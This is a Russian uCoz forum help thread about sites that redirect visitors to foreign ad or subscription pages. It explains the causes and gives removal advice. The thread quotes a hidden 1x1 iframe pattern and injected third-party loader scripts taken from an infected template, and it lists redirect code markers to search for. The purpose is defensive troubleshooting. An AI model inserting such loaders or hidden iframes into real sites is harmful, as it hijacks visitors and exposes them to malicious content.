Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой |
| При заходе на сайт перекидывает на другой |
 Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом  Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес  Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
|
webanet, В ЛС отправил.
 |
|
Здравствуйте. Помогите мне разобраться со следующей проблемой. При входе на сайт, сайт открывается и через несколько секунд выбрасывает на страницу с рекламой. Адрес сайта http://creationmischel.ucoz.ru/. Адрес страницы на которую выбрасывает http://rolex-clan.ru/.
Буду очень благодарна вашей помощи. Добавлено (15 Июл 2015, 13:40:16) Сообщение отредактировал Mischel4941 - Суббота, 11 Июл 2015, 08:01:30
|
|
Mischel4941, потенциальную опасность ведут скрипты, которые подгружаются у вас с чужих сайтов. например в шаблоне информера последних комментариев скрипт
Код <script type="text/javascript" src="http://ili.pp.ua/js_css/show.js"></script> обилие стороннего флеша тоже не красит сайт. из действительно опасного и вредоносного нет ничего |
|
Спасибо большое за совет, буду исправлять.
|
|
Здравствуйте.
При входе на сайт http://9keys.ru/ перебрасывает на сайт http://cdnsrv.com/?fp=1Nk....sub=dlc Такое бывает только с главной страницы, с остальных вроде такого нет. Помогите, пожалуйста. |
|
Айстенки, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вствляете скрипт
Код <script src="http://cdnsrv.com/serve/run.php?pid=1005&sub=dlc" async="" type="text/javascript"></script> после очистки зайдите в шаблон главной модуля магазина и в самом низу удалите это все Код <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={60822563-26C2-4861-AA2A-B6E14A038F3B}&d=2013-6-19&s=http://biserologia.ucoz.ru/panel/?a=wysiwyg;f=tmpl;m=20;t=1&cb=0.3695634494502159" type="text/javascript"></script><script id="__changoScript" type="text/javascript">var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();</script><script data-sifi-parsed="true" src="http://i.simpli.fi/dpx.js?cid=3065&m=0" id="__simpliScript" type="text/javascript"></script> после удаления стоит проверить компьютер на заражение |
|
webanet,
Цитата webanet1265461Айстенки, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вствляете скрипт<script src="http://cdnsrv.com/serve/run.php?pid=1005&sub=dlc" async="" type="text/javascript"></script> 1 поле на что заменить оставляете пустым и производите замену во всех используемых модулях. Пытаюсь так сделать, но у меня появляется табличка "Не сделано ни одной замены Проверьте правильность заменяемого кода" |
|
Айстенки, значит панель управления - дизайн - управление дизайном - интернет магазин - главная - откройте шаблон в самом верху ищите код и в самом низу удалите то что я написала ниже
и обязательно проверить компьютер на заражение |
|
Здравствуйте, сегодня смотрел статистику по Я.Метрике своего сайта - vet-academy.ru и обнаружил несколько внешних переходов вида:http://go.pushnative.com/uban.php?r=fjdzFNhxcfa... Как с этим бороться или это реклама от Юкоза?
|
|
doubleV,
Проверьте весь код в том числе скрипты на слова типа: <meta refresh>; В скриптах location.href, window.location. Попробуйте также проверить код на наличие этого адреса, например по фразам:
Если поиски не дают результата смотрите в скриптах то, что выше но уже закодированное в HEX
P.S. Закодировать ссылки можно не только в HEX. |
|
Всем привет!
Столкнулся с такой проблемой при посещении сайта всплывает окно и пишет что программное обеспечение устарело и просит обновить. Я так понимаю что это вирус. Помогите его удалить вот ссылка этого вируса. http://go.pushnative.com/uban.php?r=fjdzFNhxcfatyKwq7aFVYteuA1ymDUFuzT-54rLlANAbakHWcRWNjj9nGmu_itPgRPrGYYhUqlY5pl2OMhK346N5u8XEu7t0DBhkF3b5KerNeQ8BVAnq6oRSyCz7Wga-hoVoBYi95VwUwEEFeZEMu79PmXtd6_fAN7Xw1-t_s7W7S2tYsItPTb-svebSz5hTDM0uQSwiMF--U1OGCI835fwuoVKjEk44elzrsGzcU2faSVZRoM1y3ngKn0M2PWtlbTEumc7TE9QTNnqXNByy5IssfN6VU-1qb_SQFCupiFnDwkqpKe9x6lZ-udaIFZ1SfgAxHbA3w5drOc2Uw3ZYM5Wbn6eb9_8TBGlCAg4W3lhv0EU69_Hv8fhtVY4LKcHM Вот сайт www.maxtre.ucoz.ru на котором эта дрянь всплывает. Это окно появляется я заметил когда заходишь с мобильного тел. Но и с браузера наверно тоже. Сообщение отредактировал Konstantin9628 - Пятница, 13 Ноя 2015, 08:31:40
|
|
Konstantin9628, проверьте всплывает ли это на таких страницах как эта http://maxtre.ucoz.ru/publ/ вот эта http://maxtre.ucoz.ru/load/ на телефоне только один браузер стоит? если нет проверьте в других браузерах и отпишитесь
|
|
Проверка с браузером от Опера.
При переходе на страницу http://maxtre.ucoz.ru/publ/ - сначало переадресовывал на мобильный контент, перекидывал в маркет. После я попробовал несколько раз обновить страницу и меня перекинуло сюда srv21.quality-ueser-converts.com/srv/click/?prd_id=3420238&srv=21&pub_id=2139&pecr=1&p7=799b5%3D%3DwNwUzNwcjN1gjMwEDN0ADN3QDNcb37f&p8=26c53%3D%3DgM2kDN21a99&p1=&p2=&p3=&p4=&p5=bbeef%3D%3DAM3IzM896c0&p6=&cad%5Bimp_bidfloor%5D=33f29%3D%3DwNy4CMb8be9&cad%5Bbanner_width%5D=b99abwIzM9bcbb&cad%5Bbanner_height%5D=b1add%3DATNfe2d5&cad%5Bsite_id%5D=7097a%3DkDZ2UTOkNWO4Q2Nj9Fdy12c2c74a&cad%5Bsite_domain%5D=a9a0f%3DUncuo3bjVnLlJHd4FWbf55a3&cad%5Bsite_page%5D=38a9fvwmY1B3L1JnL692Y15SZyRHeh12LvoDc0RHa00fd1&cad%5Bdevice_ua%5D=ea8c42IDN3kjLyADMy4CMuMzMvIFUPBiNz4yNzUzLpJXYmF2UgUGbpJ2bNBCN24CM5QjMuAjL2QzLl12byh2QgkybrNWZHBSZrlGbgwCTNRFSLhCI2MjL3MTNvQXaLJWZXVGbwBXQgkSOzEFRK9CZslWdCBCMwUTOJ1CVHByOy4iMuQDIkl2byRmbBByO4VnbpxEKgAjL18SYsxWa69WT5e233&cad%5Bdevice_ip%5D=c4584%3DIzNuQzNukjMuczMff26e&cad%5Bdevice_carrier%5D=75799%3D%3DgbvZUYnVWT9143d&cad%5Bdevice_language%5D=4410b%3DUncddd1b&cad%5Bdevice_os%5D=7ae39%3D%3DARJ9kUE5UQ20159&cad%5Bdevice_osv%5D=ad1d8%3DIjLy4CNd68d0&cad%5Bdevice_connection_type%5D=559d2%3D%3DwMc63ee&cad%5Bdevice_device_type%5D=6643b%3D%3DQM298be&cad%5Buser_id%5D=b45f6wEGN5AzNxUmY0gTOtcjZ3gTL1UWMx0yYwQWMtATN5YDNiJjM4f881&cad%5Buser_geo_city%5D=1dfc1%3D%3DAIf3d81&cad%5Bimp_ref%5D=dd018%3DUncuo3bjVnLlJHd4FWb5881a&cad%5Bimp_pub_domain%5D=2baee%3DUncuo3bjVnLlJHd4FWb87314&cad%5Bimp_pub_cmp%5D=0bff3%3DkDZ2UTOkNWO4Q2Nj9Fdy12c6e737&cad%5Bimp_w_p%5D=db2c0%3D%3DQN4AzNy4CM91f11&cmp_id=4962&cpm=0.7&cce=c5285%3D%3DQN4AzNy4CM1ab8d&cad[lg_sc_r_id]=e8339==AN5MDO4QTO11340&cad[lg_tag_id]=38f96=gzM1228a&cad[lg_tr_id]=09ec9=MTN94cbd&cad[lg_level]=64c6f==wM5fc8e&cad[city_mm_id]=eedf61UTNwITN51833&cad[city_mm_t]=09788==AZvJ3bnZ3bOBSep5Ga6lmTb1e9b&cad[isp_mm_id]=6b600=gDMyEzM8d68c&cad[lg_domain]=19423=Uncuo3bjVnLlJHd4FWbe6e42&rd=0&cad[conn_t_id_mm]=d8c20==gMd5e99&cad[lg_id]=29e5f==wN5AzN5ADM3YTO3AzN0ADN3QDN0c4e3 Со второй ссылкой аналогично перекидывает на мобильный контент, подписку. bandr.wapshop.gameloft.com/subscribe/?returnurl=http:%2F%2Fwapshop.gameloft.com%2Fb2c_ru%2Fhd%2Fsubscription_dl.php%3Fms_sid%3D5257635423%26phoneId%3D6961%26sv6023%3D8sb0848v8z0oahjyqr3v%26from%3DADID-430007%26opref%3Dkimia-hRUMA151113000898977103509007052f010MAN4d6000956PZ02005%26c%3D176%26adid%3D430007&sv6023=5645a5c45f8751f40038&cr=43917&sa_unique_id=72f82f61419cb72c68caa845454f4e74&sa_sequence_id=536cbf050913e73aa505015bb053e3f1_01&flowExecutionKey=R3F0r1447404997593RU&result=async&subscribed=false Проверил браузером от Google Chrome тоже самое ридерикты на мобильный контент. Сайт заражен этой дрянью. Как от нее избавиться. Помогите... Сообщение отредактировал Konstantin9628 - Пятница, 13 Ноя 2015, 12:02:38
|
|
Konstantin9628, пишите в бесплатную тех.поддержку из панели управления сайтом. предоставляйте всю информацию, как вы сделали в этой теме
|
| |||